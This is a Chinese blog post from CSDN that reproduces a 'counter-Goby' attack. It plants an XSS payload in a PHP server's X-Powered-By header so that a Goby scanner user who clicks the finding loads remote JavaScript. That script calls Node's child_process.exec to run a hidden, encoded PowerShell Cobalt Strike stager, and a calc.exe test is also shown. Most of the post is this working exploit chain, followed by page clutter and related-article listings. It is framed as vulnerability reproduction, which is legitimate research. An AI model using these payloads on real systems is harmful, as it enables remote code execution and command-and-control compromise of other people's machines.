反制Goby扫描之XSS点击上线

最新推荐文章于 2024-05-15 14:12:13 发布
最新推荐文章于 2024-05-15 14:12:13 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: 漏洞复现 安全工具 文章标签: 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/119711276
版权

在这里插入图片描述

反制Goby扫描之XSS点击上线

最近看到有大佬利用goby漏洞反制攻击者,特意复现下,原理就是通过XSS进行交互,调用Node.js函数exec执行命令,最新版本已经进行了修复,如果还在使用低版本还是尽快升级吧。

1.测试环境

  • CS4.3
  • goby-win-x64-1.8.255,Goby扫描器IP:192.168.0.195
  • phpstudy2016,http服务:http://192.168.0.198:81/index.php

2.XSS测试

修改http服务器的X-Powered-By,注意此处<img src=1 onerror=alert(1)> 标签中应该是tab,而非空格。

<?php
header("X-Powered-By: PHP/<img	src=1	οnerrοr=alert(1)>");
?>
<head>
<title>SEC TEST</title>
</head>
<body>
</body>
</html>

扫描之后结果如下:
在这里插入图片描述

点击即可触发XSS:
在这里插入图片描述

3.CS上线

利用require('child_process').exec()函数进行命令执行,在以上的基础上:
服务器端代码如下:

<?php
header("X-Powered-By: PHP/<img	src=1	οnerrοr=import(unescape('http%3A//192.168.0.198:81/js/1.js'))>");
?>
<head>
<title>SEC TEST</title>
</head>
<body>
</body>
</html>

1.js内容如下,执行内容为CS的powershell上线脚本:

(function(){
require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');
})();

在这里插入图片描述

可以先使用计算器进行测试。

(function(){require('child_process').exec('calc.exe');})();

在这里插入图片描述
踩坑:

  1. js函数要设置void的话就无返回值,程序运行不起来的。
  2. goby存在缓存,改动JS后建议删掉goby重新跑一遍。
痴人说梦梦中人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
溯源系列:溯源(八)之利用goby RCE 进行黑客
01-06
溯源系列:溯源(八)之利用goby RCE 进行黑客
Goby复现
qq_50854662的博客
11-03 525
Goby复现
2024年最新技术分享 针对蜜罐Goby背后的故事(3),2024年最新花了19998买的学习教程
最新发布
2401_84904706的博客
05-15 565
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!在达成条件之后,这个漏洞能够带来的后果非常严重,可以被方直接控Goby所在的PC,但幸运的是这个漏洞并不是一个0click漏洞,需要Goby的使用人员来配
溯源(八)之利用goby RCE 进行黑客
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-03 763
当然在这里我们要点这个之后代码才会被触发,实际过程中我们需要诱导攻者去点这些可以交互的地方,我这里可以给大家提供一个思路,我们可以在环境中部署一个蜜罐,那蜜罐是不是会模拟很多可以攻的服务诱导攻者攻,在goby扫描过程中,攻者看到那么多的服务会不会去疯狂点和查看扫到了些什么?当goby扫描网站时,会去扫描网站下的目录,再根据网站目录下的文件去得到一些网站的信息,我们扫到的php服务就是根据被扫的文件得到的。所展示给我们的网站扫出来的信息都是程序写死的,这样我们很难去利用xss漏洞去
溯源-漏洞扫描工具-Goby&Awvs
m0_62172162的博客
04-25 366
溯源-漏洞扫描工具-Goby&Awvs
xssGo:自动跨站点脚本(XSS扫描
05-13
xssGo-自动Xss扫描仪 "xssGo" is designed to automate scanning cross site scripting vulnerabilities. Most important functionality of the program is that because of testing with a real browser, not ...
XSStrike好用的xss扫描
08-23
为了防御和检测XSS漏洞,XSStrike应运而生,它是一款强大的自动化XSS扫描工具。 XSStrike结合了多种技术和策略,包括但不限于模糊测试、模式匹配、逻辑推理等,以高效地发现潜在的XSS漏洞。它不仅能够识别出传统的...
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
基于JS的XSS扫描器——XSS Rays. 最近The Spanner发布了一个名为XSS Rays的 XSS漏洞扫描器。这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例去测试,可以发现DOM的XSS(当然是在测试用例打...
奇安信安全扫描漏洞解决路径遍历和存储型xssxss漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
前端安全之XSS
02-25
有人将XSS分为三种,分别是:1.ReflectedXSS(基于射的XSS)2.StoredXSS(基于存储的XSS)3.DOM-basedorlocalXSS(基于DOM或本地的XSS)基于射的XSS,主要依靠站点服务端返回脚本,在客户端...
goby-win-x64-1.8.293.zip
08-13
goby-win-x64-1.8.293.zip
goby-win-x64-1.8.239.zip
05-25
扫描工具
goby-win-x64-1.8.255.zip
08-15
Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻面信息,同时能进行高效、实战化漏洞扫描,并快速地从一个验证入口点,切换到横向。我们希望能够输出更具生命力的工具,能够对标黑客的实际能力,帮助企业来有效地理解和应对网络攻
Goby红队版-win-x64-2.4.7版本
07-27
Goby红队专版:集成1500个poc和exp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双goby.exe运行即可 注意事项: 最新的漏洞不可以在线更新,可自行添加poc和exp 重要的事情说三遍 不要用于非法或未授权测试! 不要用于非法或未授权测试! 不要用于非法或未授权测试! 自行判断可刑性!
goby-win-x64-2.0.1。goby,windows版本,2.0.1.需要的自取。
07-09
Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。 Goby主要特性: 实战性:Goby并不关注漏洞库的数量有多么多,而是关注真正用于实际攻的漏洞数量,以及漏洞的利用深度; 体系性:打通渗透前,渗透中,以及渗透后的完整流程完整DOM事件收集,自动化触发。 高效性:利用积累的规则库,全自动的实现IT资产攻面的梳理;效率提升数倍,发包更少速度更快、更精准; 平台性:发动广泛的安全人员的力量,完善上面提到的所有资源库;包括基于社区的数据共享,插件发布,漏洞共享等; 艺术性:安全工具原本就比较偏门,我们更多的关注功能而非美观度,所有大部分的安全工具都是其貌不扬;我们希望使用Goby能给大家带来感官上的享受。
GNU 黑客开发端口扫描工具
weixin_34221775的博客
06-02 198
德国知名IT媒体Heise上周报道了英国情报机构GCHQ的大规模监视系统HACIENDA,HACIENDA系统使用端口扫描工具扫描了27个国家的所有联网服务器,寻找存在漏洞的系统。为了避开端口扫描保护不公开的服务器,几位GNU开发者在德国举行的GNU黑客会议上透露了他们开发的规避工具TCP Stealth系统及其自由软件实现Knock。TCP Steal...
xss
cs_xiaoqiang的博客
01-20 1221
xss漏洞的自我总结: (1)    xss漏洞一般存在于输入框、URL栏。只要网站能够运行js,并且有输入框、通过第三方上传文件的都可能存在xss漏洞。 (2)    xss漏洞的原理。通过将恶意的代码与正常的代码进行拼接成我们想要执行的代码。 (3)    一般来说我只要能够让他运行我们所上传的代码,就代表存在xss漏洞。(一开始练习的时候,用alert弹窗,能够快速的检查我们的
goby是主机扫描还是web扫描
07-14
当进行Web扫描时,Goby可以帮助安全人员自动识别目标网站中的漏洞和安全问题,包括常见的Web应用程序漏洞、XSS漏洞、SQL注入漏洞等。这有助于发现并修复网站中的安全漏洞,提高网站的安全性。 总而言之,Goby是一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值